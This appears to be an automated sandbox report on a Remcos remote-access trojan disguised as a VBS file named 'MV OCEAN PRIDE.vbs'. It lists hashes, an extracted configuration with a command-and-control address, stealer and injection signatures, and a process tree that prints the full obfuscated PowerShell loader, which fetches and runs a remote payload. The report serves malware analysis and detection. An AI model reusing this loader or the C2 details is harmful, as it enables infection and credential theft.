remcos | ad2aa163a40ed711cf8d945c9f4c035eb257e67d8987648c98e9578578f2f544

Analysis

max time kernel
148s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08-10-2024 06:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MV OCEAN PRIDE.vbs
Size

214KB
MD5

7eaa8d136858efb4573938706338096f
SHA1

4e0b80849f1164c7943946987c15f32a43dba223
SHA256

57eab6c4e70ae89f96d173062df0ef84292e6315d474cb416f5c776b489cc3da
SHA512

06f909e47acbc1f238881526e70da2a6cbdf1e5fc3eb019bb8f758042b8c2498c73bc4cb77f7b835dcfc9064fa4d79d4de189c3aa50e2a661e35c96e9b512af0
SSDEEP

6144:gAOTDoRQRWAgAHNSjH1EWMS/RT/Sfj986x8WIERjNNkSkwwihiW3J0GYeduNvbdH:9lH6z0T2bg

Score

10^/10

remcos remotehost collection discovery rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.214:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AOD6MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/1084-98-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/972-92-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1536-91-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1536-91-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/972-92-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 6 IoCs

flow	pid	Process
3	1348	WScript.exe
7	2480	powershell.exe
9	2020	msiexec.exe
10	2020	msiexec.exe
12	2020	msiexec.exe
13	2020	msiexec.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2020	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3068	powershell.exe
2020	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2020 set thread context of 972	2020	msiexec.exe	37
PID 2020 set thread context of 1536	2020	msiexec.exe	38
PID 2020 set thread context of 1084	2020	msiexec.exe	39

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2480	powershell.exe
3068	powershell.exe
3068	powershell.exe
972	msiexec.exe
972	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
3068	powershell.exe
2020	msiexec.exe
2020	msiexec.exe
2020	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	1084	msiexec.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 1348 wrote to memory of 2480	1348	WScript.exe	31
PID 1348 wrote to memory of 2480	1348	WScript.exe	31
PID 1348 wrote to memory of 2480	1348	WScript.exe	31
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 3068 wrote to memory of 2020	3068	powershell.exe	35
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 972	2020	msiexec.exe	37
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1536	2020	msiexec.exe	38
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39
PID 2020 wrote to memory of 1084	2020	msiexec.exe	39

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV OCEAN PRIDE.vbs"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Computerstyre Creatinephosphoric reheal Papillated Dieldrins Rosseaus #>;$Hustelefonerne='Unwintry';<#leeky Kastreringers stegepanden #>;$Vetiveria=$Hagerem+$host.UI;If ($Vetiveria) {$Forhjede++;}function Ophjningen($jovialt){$Genfandt=$Uddannelsessttte+$jovialt.Length-$Forhjede; for( $Bogtilrettelgningen=3;$Bogtilrettelgningen -lt $Genfandt;$Bogtilrettelgningen+=4){$skinverdnernes='skohorns';$Elementhuses188+=$jovialt[$Bogtilrettelgningen];$Affolkningen='sprngt';}$Elementhuses188;}function Flderandene($Dataforbindelse){ . ($Camail) ($Dataforbindelse);}$Opslugninger=Ophjningen 'GodMLinoTryzKrei ltl I l siaMan/abe5 ,u.Eas0sto ro(TotW UsiThinRe.dNs o hw Als hi p.NAfsT Mo Nec1Bo 0 In.syr0Ove;Apo KurWTipiAllnFr 6Jam4sny; al lulxslr6 ,a4Exp;Tul UnirLatv .h: Dh1Ovo2ter1 Ar.In 0Apo)sis BdkG Miedimc ,okG,foA p/Mid2Art0Pri1se.0Mun0 fo1 a0Avi1 K RevFpliiE er reeCyafVigoDisxstu/Br 1Hal2 fo1Glu.Rod0An ';$systemopstningerne=Ophjningen 'ForuTers uoeBefr ak-.elAKatGMi e unnEmbt ve ';$Antedaterede=Ophjningen 'Chrh eftZ itNonpAfr:U s/ sc/.ele,raq FouBraiKlup pl4Clo.Fris ihChloUnfpFor/ nYKorqGilrPoreN nE f k TaF K.OD a/PreRDure BasH rtRapaReauaucrstueGrarslaeFrid leePoss a.UnfdParwMacpK v ';$Burian=Ophjningen 'Ba >Tvi ';$Camail=Ophjningen 'Noni o.EPr XArt ';$Rensdyrlavernes='Catharism';$Redningsvestes='\Vejplade.Agg';Flderandene (Ophjningen ' F,$oveg .al aOsc.B BrAKorLspk:Trul,esA K NBeidBrurMilY pv=Her$GanEspaNF gv r:sy.aHelPE ep Apd KaaKolttulAAsc+Ov $Jagr Exe E dHunn OviUskNRepgMunsUlvvstoeTr.s.igTbedeGo sCry ');Flderandene (Ophjningen ',yd$VinG hel .aOs lBNovAImpLCor:EnsC BuAPe,rskuLsw y solReaeOvesEftq eduUnve sa=Afs$Guda bonC etVolEBrydheiaH uTLyseustRmi,eH,ld Koesty.OvesAmpPR,clResIF etstr(Kla$ inbB eUE,cR ReI.piADosNsp )I,t ');Flderandene (Ophjningen 'Coa[ nnnLedeFadTK.l. its M.EM crG mVnonIOveCPleE,elPUnao TrIMarnchatId,MAt A NuNCata s GUnrE rrTit]sla:Oph:Decs krEVolc PeuAtoROl I ytre yP.aPbefr jnOPortAn,O GeCCryOPasl La Ben=Pre non[lanNConE tytCol.C ls deKa.C,ndustarr gI tetT.rysl,pCh.rFr,OMouTMadoPlacTiloPselAnlt Ury,kkpAr eLec]Ho,:Rad: Kit,opLpt,s,ol1 Ch2Mon ');$Antedaterede=$Carlylesque[0];$Fishiness=(Ophjningen ' y$F jgJiblb.eosaiB U aOrdlski:Plkl agIvddnHoyoTroL Bre,jrU,wemComsvart mnrHasYsp.KEn = ofn she dowsfr-Te OPlab epjAntEZapcKontOrd FlsT,iyVilsRegt sueHalm.na..rrn eaEMiaTIn,.MagWQuiE s BKr C lgL akiIn E ornKrat h. ');Flderandene ($Fishiness);Flderandene (Ophjningen 'Eft$FerLseliOblnBuroPeelProe caugrim Als ortInfr styLaakTet.BueHIn,eUnpatutdBrueHarrPinsPho[shl$samsHumyr ysn utB aeUltm CioIndp alsHumtKi,nPhoiKonnPa.gBuseslurcu nPreeDis].en=M l$Nu O prpheas Dil R,u ,egAk,ntalihy.nMengFlaesigrVkk ');$Aprjtelakeringsvrkstedet=Ophjningen 'A c$BicLCoti un NioDislAmeeTi uskam KosEmbttidrEsty.bak Pe.KikDLeuoManwN nn gel VaoI daMasdManF Hyi orl.aresta(Ov $RomAtetn KetBeheReidD.aafh tmuzeIntrO ye Fyd niesyv,sho$dveYKryuUv.rByluKunkB.l) ig ';$Yuruk=$Landry;Flderandene (Ophjningen ' Pl$ F gF nl OuOslvB Ela LilMer:Vocs stKWa r FiUC ietreB,huLlivyArvaVanNNonT ste,anrUnbN InE Faswee=Cau(indT OseAnhs Klt ,l-OutPsuba TrTRe,h sw Ka$Napy KoURanrParUAchKPom)Lev ');while (!$skrueblyanternes) {Flderandene (Ophjningen ' on$s,bgRyglResoHerb etaUnpl so:sapN ReaDuorO,prRig=sn.$Fo t agrWhou heRea ') ;Flderandene $Aprjtelakeringsvrkstedet;Flderandene (Ophjningen 'Dk sursTMopaGe rGaptEnf-Excsforl AvEsjae vpKol H 4Elo ');Flderandene (Ophjningen 'Arm$BenGRebl CyoGenbLinAU slPhi:sers usKBilRVidUErheEr,B,ilLs,dy.jaA Men .rTEmeeMyeRUdsNFraETids .o= on(antt.aceAl.s OrT .a-At p MuaUsmTAdmHFor saf$IntYs iuproRTiduNo K,ni)Opt ') ;Flderandene (Ophjningen 'sim$ExtGAskLOpiosteB.ilaAp,L De:B.lDAm E,eemscriCtelFabiBehtHu,e otR .eAV,tTUlae Br=Fa.$PsyG eglDo.OEo Bfora FlLDid:slrestrustiDDatEKniMEcto H,nHy.i,arA Dr+Ge,+Rag%Vej$subc araDejRNaplOveys oLTekEUnssO,eqFl,ustiEsel.stiCNetO roUBioNFort.rf ') ;$Antedaterede=$Carlylesque[$Demiliterate];}$Foliant130=308079;$Faceable=28513;Flderandene (Ophjningen ' t$Unrgf.nL,enO C.b,emA .plhom:Pe,s anUKi pHanEHotR uE PlxT oC KarInaeZ.os RucInte K nallt ar9 ca4Tra er = va ChGPareZootKon-Anac ByO Adn A T MaEJo.nptat Fl R a$PhoY FoUPraR,aruL uKFor ');Flderandene (Ophjningen ' i$sneg n lAntoUskb ha smlGai:UopBBdniTralU st njoAc.gUdje ertPu s sc2 am0Typ3C.r ,et=Di. Des[ asAmtyswasKrytL.uesp,mVes. olC H oFygn rovNj,ePatrCo t ma] Un:ste:R fF itrWaloChum,euBFllaMids HjeUno6 En4 sesP.atsymrBehiAr,n AlgUni( Ci$IncsG aucorp UnePhrr efehldxClacsisrI.ceNa s abcKrse TinUn t Un9 Gl4 re) P. ');Flderandene (Ophjningen ' n$salG AnlrowoFa b fraJesl na:InksM shNona .nmUnco oYPasIKigNHubGs y su =.ov Pi[ ilsVe Y .isNegTEpie emspe.H lt,sbEmozxM rTEcp.EchEA bn.auCk noReld HeI ,wNMisg en] T :E,u:Wiea U skalcsubiDonI er. HaGGrieUncT asRinT H RUnaispnn GygRe ( ra$Boub D.I elBttTEndO,adg ge smTsk ssud2Div0Fi 3Ind)Udk ');Flderandene (Ophjningen ' B $TilGN.nlParORa.bUn,as olskd: PhaPu DBasEverQResU seAMelTWo i emo paN s =skr$DevsF nHTr A s M ocokalysl,iMonnPolGKam. MasHybu Lob onssa TL tR .cIBranH,vGs l(W,t$Af f .io W.LUniI,riaKalnRest ar1 a3spr0Inf,Unm$Ti FBraaFibCEksesu,ADagbKlolReceIde)Ced ');Flderandene $Adequation;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Computerstyre Creatinephosphoric reheal Papillated Dieldrins Rosseaus #>;$Hustelefonerne='Unwintry';<#leeky Kastreringers stegepanden #>;$Vetiveria=$Hagerem+$host.UI;If ($Vetiveria) {$Forhjede++;}function Ophjningen($jovialt){$Genfandt=$Uddannelsessttte+$jovialt.Length-$Forhjede; for( $Bogtilrettelgningen=3;$Bogtilrettelgningen -lt $Genfandt;$Bogtilrettelgningen+=4){$skinverdnernes='skohorns';$Elementhuses188+=$jovialt[$Bogtilrettelgningen];$Affolkningen='sprngt';}$Elementhuses188;}function Flderandene($Dataforbindelse){ . ($Camail) ($Dataforbindelse);}$Opslugninger=Ophjningen 'GodMLinoTryzKrei ltl I l siaMan/abe5 ,u.Eas0sto ro(TotW UsiThinRe.dNs o hw Als hi p.NAfsT Mo Nec1Bo 0 In.syr0Ove;Apo KurWTipiAllnFr 6Jam4sny; al lulxslr6 ,a4Exp;Tul UnirLatv .h: Dh1Ovo2ter1 Ar.In 0Apo)sis BdkG Miedimc ,okG,foA p/Mid2Art0Pri1se.0Mun0 fo1 a0Avi1 K RevFpliiE er reeCyafVigoDisxstu/Br 1Hal2 fo1Glu.Rod0An ';$systemopstningerne=Ophjningen 'ForuTers uoeBefr ak-.elAKatGMi e unnEmbt ve ';$Antedaterede=Ophjningen 'Chrh eftZ itNonpAfr:U s/ sc/.ele,raq FouBraiKlup pl4Clo.Fris ihChloUnfpFor/ nYKorqGilrPoreN nE f k TaF K.OD a/PreRDure BasH rtRapaReauaucrstueGrarslaeFrid leePoss a.UnfdParwMacpK v ';$Burian=Ophjningen 'Ba >Tvi ';$Camail=Ophjningen 'Noni o.EPr XArt ';$Rensdyrlavernes='Catharism';$Redningsvestes='\Vejplade.Agg';Flderandene (Ophjningen ' F,$oveg .al aOsc.B BrAKorLspk:Trul,esA K NBeidBrurMilY pv=Her$GanEspaNF gv r:sy.aHelPE ep Apd KaaKolttulAAsc+Ov $Jagr Exe E dHunn OviUskNRepgMunsUlvvstoeTr.s.igTbedeGo sCry ');Flderandene (Ophjningen ',yd$VinG hel .aOs lBNovAImpLCor:EnsC BuAPe,rskuLsw y solReaeOvesEftq eduUnve sa=Afs$Guda bonC etVolEBrydheiaH uTLyseustRmi,eH,ld Koesty.OvesAmpPR,clResIF etstr(Kla$ inbB eUE,cR ReI.piADosNsp )I,t ');Flderandene (Ophjningen 'Coa[ nnnLedeFadTK.l. its M.EM crG mVnonIOveCPleE,elPUnao TrIMarnchatId,MAt A NuNCata s GUnrE rrTit]sla:Oph:Decs krEVolc PeuAtoROl I ytre yP.aPbefr jnOPortAn,O GeCCryOPasl La Ben=Pre non[lanNConE tytCol.C ls deKa.C,ndustarr gI tetT.rysl,pCh.rFr,OMouTMadoPlacTiloPselAnlt Ury,kkpAr eLec]Ho,:Rad: Kit,opLpt,s,ol1 Ch2Mon ');$Antedaterede=$Carlylesque[0];$Fishiness=(Ophjningen ' y$F jgJiblb.eosaiB U aOrdlski:Plkl agIvddnHoyoTroL Bre,jrU,wemComsvart mnrHasYsp.KEn = ofn she dowsfr-Te OPlab epjAntEZapcKontOrd FlsT,iyVilsRegt sueHalm.na..rrn eaEMiaTIn,.MagWQuiE s BKr C lgL akiIn E ornKrat h. ');Flderandene ($Fishiness);Flderandene (Ophjningen 'Eft$FerLseliOblnBuroPeelProe caugrim Als ortInfr styLaakTet.BueHIn,eUnpatutdBrueHarrPinsPho[shl$samsHumyr ysn utB aeUltm CioIndp alsHumtKi,nPhoiKonnPa.gBuseslurcu nPreeDis].en=M l$Nu O prpheas Dil R,u ,egAk,ntalihy.nMengFlaesigrVkk ');$Aprjtelakeringsvrkstedet=Ophjningen 'A c$BicLCoti un NioDislAmeeTi uskam KosEmbttidrEsty.bak Pe.KikDLeuoManwN nn gel VaoI daMasdManF Hyi orl.aresta(Ov $RomAtetn KetBeheReidD.aafh tmuzeIntrO ye Fyd niesyv,sho$dveYKryuUv.rByluKunkB.l) ig ';$Yuruk=$Landry;Flderandene (Ophjningen ' Pl$ F gF nl OuOslvB Ela LilMer:Vocs stKWa r FiUC ietreB,huLlivyArvaVanNNonT ste,anrUnbN InE Faswee=Cau(indT OseAnhs Klt ,l-OutPsuba TrTRe,h sw Ka$Napy KoURanrParUAchKPom)Lev ');while (!$skrueblyanternes) {Flderandene (Ophjningen ' on$s,bgRyglResoHerb etaUnpl so:sapN ReaDuorO,prRig=sn.$Fo t agrWhou heRea ') ;Flderandene $Aprjtelakeringsvrkstedet;Flderandene (Ophjningen 'Dk sursTMopaGe rGaptEnf-Excsforl AvEsjae vpKol H 4Elo ');Flderandene (Ophjningen 'Arm$BenGRebl CyoGenbLinAU slPhi:sers usKBilRVidUErheEr,B,ilLs,dy.jaA Men .rTEmeeMyeRUdsNFraETids .o= on(antt.aceAl.s OrT .a-At p MuaUsmTAdmHFor saf$IntYs iuproRTiduNo K,ni)Opt ') ;Flderandene (Ophjningen 'sim$ExtGAskLOpiosteB.ilaAp,L De:B.lDAm E,eemscriCtelFabiBehtHu,e otR .eAV,tTUlae Br=Fa.$PsyG eglDo.OEo Bfora FlLDid:slrestrustiDDatEKniMEcto H,nHy.i,arA Dr+Ge,+Rag%Vej$subc araDejRNaplOveys oLTekEUnssO,eqFl,ustiEsel.stiCNetO roUBioNFort.rf ') ;$Antedaterede=$Carlylesque[$Demiliterate];}$Foliant130=308079;$Faceable=28513;Flderandene (Ophjningen ' t$Unrgf.nL,enO C.b,emA .plhom:Pe,s anUKi pHanEHotR uE PlxT oC KarInaeZ.os RucInte K nallt ar9 ca4Tra er = va ChGPareZootKon-Anac ByO Adn A T MaEJo.nptat Fl R a$PhoY FoUPraR,aruL uKFor ');Flderandene (Ophjningen ' i$sneg n lAntoUskb ha smlGai:UopBBdniTralU st njoAc.gUdje ertPu s sc2 am0Typ3C.r ,et=Di. Des[ asAmtyswasKrytL.uesp,mVes. olC H oFygn rovNj,ePatrCo t ma] Un:ste:R fF itrWaloChum,euBFllaMids HjeUno6 En4 sesP.atsymrBehiAr,n AlgUni( Ci$IncsG aucorp UnePhrr efehldxClacsisrI.ceNa s abcKrse TinUn t Un9 Gl4 re) P. ');Flderandene (Ophjningen ' n$salG AnlrowoFa b fraJesl na:InksM shNona .nmUnco oYPasIKigNHubGs y su =.ov Pi[ ilsVe Y .isNegTEpie emspe.H lt,sbEmozxM rTEcp.EchEA bn.auCk noReld HeI ,wNMisg en] T :E,u:Wiea U skalcsubiDonI er. HaGGrieUncT asRinT H RUnaispnn GygRe ( ra$Boub D.I elBttTEndO,adg ge smTsk ssud2Div0Fi 3Ind)Udk ');Flderandene (Ophjningen ' B 